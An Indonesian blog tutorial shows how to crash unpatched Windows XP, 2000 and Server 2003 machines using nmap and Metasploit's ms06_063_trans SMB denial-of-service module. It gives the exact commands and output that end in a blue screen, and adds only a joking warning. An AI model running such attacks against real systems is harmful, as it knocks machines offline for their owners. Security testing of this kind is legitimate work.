DOS windows menggunakan metasploit

berawal dari jalan-jalan ke youtube, ehh.. ketemu vidio tutorial cara DOS (denial of service) windows menggunakan metasploit, sebenarnya sudah sejak lama mau ane praktekkan, namun ada sedikit kendala, bingung mau cari terget dimana, dan yang jelas jangan sampai merugikan orang lain, semakin hari semakin penasaran, ane pinjam aja laptop harim ane dijadikan bahan percobaan dan hasilnya work 100%.



berikut daftar versi windows yang bisa buat di eksekusi  

Microsoft Windows XP Tablet PC Edition SP2  
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Profesional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Emas 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Versi 2003 SP1
Microsoft Windows XP 64-bit Edition 2003 Versi
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Itanium
Microsoft Windows Server 2003 Enterprise Edition SP1 Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Itanium
Microsoft Windows Server 2003 Datacenter Edition SP1 Itanium
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 SP4 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

Disini saya menggunakan BackTrack linux, METASPLOIT dan NMAP secara default sdh terinstall didalamnya, nah bagi anda yang menggunakan OS lain, silahkan menginstall metasploit dan nmap terlebih dahulu, ok saya anggap anda sudah menginstall metasploit dan nmap.

Kita melakukan DOS melalui port 445, misalkan IP address target tipe (C) 192.168.1.4 kemudian kita scan menggunakan nmap.

dede@backtrack:~# nmap -O 192.168.1.4
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-07 21:02 CIT
Nmap scan report for 192.168.1.4
Host is up (0.00030s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2869/tcp open  icslap
MAC Address: 08:00:27:BF:EF:CC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.31 seconds
dede@backtrack:~#

Ok port 445 terbuka, dan target menggunakan OS windows XP SP2, buka metasploit anda, saya lebih suka menggunakan versi CLI, ketikkan di terminal msfconsole, kalu mau menggunakan versi GUI ketikkan msfgui.

dede@backtrack:/pentest/exploits/framework3# msfconsole
_                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
|/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\
=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ — –=[ 737 exploits - 378 auxiliary - 85 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
=[ svn r13820 updated today (2011.10.06)
msf >

 kemudian ketikkan perintah berikut  

• use dos/windows/smb/ms06_063_trans  

• show options

akan muncul seperti dibawah ini

Module options (auxiliary/dos/windows/smb/ms06_063_trans):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                                   The target address
RPORT  445              yes       Set the SMB service port
msf  auxiliary(ms06_063_trans) >

Disitu terlihat RHOST atau IP target belum di set, ya jelas saja, kan kita belum men set. caranya ketikkan perintah berikut: 

• set RHOST 192.168.1.4

sekarang kita lihat apakah kita sdh men set IP target

show options
Module options (auxiliary/dos/windows/smb/ms06_063_trans):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  445              yes       Set the SMB service port
msf  auxiliary(ms06_063_trans) >

 ok saatnya kita mengeksekusi target, ketikkan perintah berikut 

• exploit

akan muncul seperti ini:

msf  auxiliary(ms06_063_trans) > exploit
[*] Connecting to the target system…
[*] Sending bad SMB transaction request 1…
[*] Sending bad SMB transaction request 2…
[*] Sending bad SMB transaction request 3…
[*] Sending bad SMB transaction request 4…
[*] Sending bad SMB transaction request 5…
[*] Auxiliary module execution completed
msf  auxiliary(ms06_063_trans) >

kemudian cek komputer target, wkwkwkwk…… windowsnya langsung shyok, mendadak bluescreen

 



semoga bermanfaat, saran dari ane, jangan di buat merugikan orang lain, ingat dosa wkwkwk